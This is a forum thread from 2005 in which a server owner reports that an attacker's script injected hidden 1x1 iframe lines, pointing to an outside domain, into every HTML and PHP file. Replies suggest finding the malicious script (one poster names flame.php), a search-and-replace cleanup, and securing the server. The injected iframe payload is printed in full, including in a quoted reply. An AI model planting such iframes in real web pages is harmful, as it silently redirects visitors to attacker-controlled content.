Server get hacked

**vishwas** · 11-27-2005 11:38 PM

Hello,

My server get hacked , what hacker do he runs some script & it puts these two lines in all .html and *.php file and all sites redirects to that domain. mainly it puts these two lines in all index file and its pain to remove these two line with editing each file :S may be its virus !!

Anyone have solution for this !!!!!

<iframe src='http://domain.com/images/index.html' width=1 height=1></iframe>
<iframe src='http://domain.com/images/index.html' width=1 height=1></iframe>

**jaymc** · 12-01-2005 09:29 AM

First thing to do is locate the mal CODE that is doing this

second is to write a simple php script or something to do a search and replace on all .htm files

str_replace()

will be of use

Also, you say 'hacked'... I would call this some one having an account on your server, and takin advantage of the OPEN_BASE security issue you have yet to address, thus giving him access to every file and folder on your server...

He could actually do a lot more than change HTM files, so think your self as lucky

**JohnodACD** · 12-01-2005 11:41 AM

I had this in my server as well it was a file called flame.php that was loaded in a users images folder. when this path was called it redirected all the sites to a forign server(meaning not mine).

When i suspended this site it then redirected all my sites to teh suspend page untill i rebooted teh server.

I also noticed that if you change the password for this domain or account on teh server they can still get access to it so you want to suspend the site if you can find teh files and then delete the files then change teh passowrd.

**AndyReed** · 12-01-2005 11:51 AM

Originally Posted by vishwas

Hello,

My server get hacked , what hacker do he runs some script & it puts these two lines in all .html and *.php file and all sites redirects to that domain. mainly it puts these two lines in all index file and its pain to remove these two line with editing each file :S may be its virus !!

Anyone have solution for this !!!!!

<iframe src='http://domain.com/images/index.html' width=1 height=1></iframe>
<iframe src='http://domain.com/images/index.html' width=1 height=1></iframe>

Just in case you are overwhelmed with the cleaning up task, may I suggest you hire a sys admin to round up, secure and protect your server.

**jackie46** · 12-01-2005 11:02 PM

Should he hire you?

**chirpy** · 12-02-2005 03:49 AM

He can if you wishes to. Any has a good reputation on these forums for helping people in such situations, as have others.

LinkBack

Thread Tools

Server get hacked

Is my server hacked?

my server is hacked

server has been hacked

my server got hacked?

new server got hacked